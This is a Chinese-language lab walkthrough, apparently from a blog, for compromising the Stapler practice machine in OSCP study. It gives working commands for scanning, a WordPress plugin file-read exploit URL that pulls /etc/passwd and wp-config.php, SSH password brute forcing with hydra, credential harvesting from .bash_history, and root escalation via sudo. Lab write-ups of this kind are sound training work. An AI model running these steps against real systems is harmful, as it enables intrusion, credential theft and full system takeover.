第一步:netdiscover
第二步:nmap
第三步:存在20/21ftp服务,先尝试一下匿名访问,看看有无有用信息(anonymous)
第四步,发现只是闲聊信息,下面看一下12380的web服务,并进行目录扫描,查看泄露目录robots.txt
dirb https://192.168.107.143:12380 当然这里也可以使用:nikto -h 192.168.107.143:12380 nikto详细用法:https://blog.csdn.net/smli_ng/article/details/105994754
第五步:发现存在wp框架,使用wpscan进行扫描,wp框架存在大量模块漏洞,(WPScan使用完整攻略:https://www.freebuf.com/sectool/174663.html)
存在疑似uploads文件上传接口,plugins模块[DIR] advanced-video-embed-embed-videos-or-playlists
第六步:插件 Advanced Video Embed,我们检查了 searchsploit。果然,看起来这个插件有一个可利用的漏洞。
/usr/share/exploitdb/exploits/php/webapps/39646.py
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
https://192.168.107.143:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
因为当我导航到这个 url 时,它是一个断开的链接
https://192.168.107.135:12380/blogblog/?p=210
最后我意识到,每次运行它时,该漏洞都会创建一个新的博客条目。该博客条目的标题为 jpeg。
https://192.168.107.135:12380/blogblog/
查看 wp-content/uploads 目录
wget --no-check-certificate https://192.168.107.143:12380/blogblog/wp-content/uploads/864820861.jpeg
cat 864820861.jpeg | grep /bin/bash | cut -d ":" -f1
通过 grepping /bin/bash 然后剪切,我可以获得为 shell 配置的用户(以后可用hydra暴力破解)
第七步:然后我们尝试获得wp-config.php文件(wp配置文件) ../wp-config.php
wget --no-check-certificate https://192.168.107.143:12380/blogblog/wp-content/uploads/1462524421.jpeg 然后cat查看
第七步:获取shell还有root权限(方式1:通过获取的数据库密码,敏感信息hydra暴力获得用户,进入各用户目录查看命令执行记录获取满权限用户重置root密码)
有个密码:plbkac
hydra ssh://192.168.107.143 -L users.txt -p plbkac
cd /home放的是所有用户的信息
看起来在用户 JKanode 的主目录中,他们有一个 .bash_history 文件,其中包含一些密码信息。我尝试了这两个帐户,实际上这两个密码都可以让您登录。
几乎所有用户都有.bash_history
peter用户具有所有权限,可直接重置root密码sudo passwd root
第八步:获取shell还有root权限(方式2:)
由获取到的数据库root密码,以及目录扫描得出的phpMyAdmin目录,进行登录而后利用mysql OUTFILE上传文件
标签:Stapler,107.143,192.168,12380,https,wp,靶机,root,OSCP From: https://www.cnblogs.com/justdoIT20680/p/17869430.html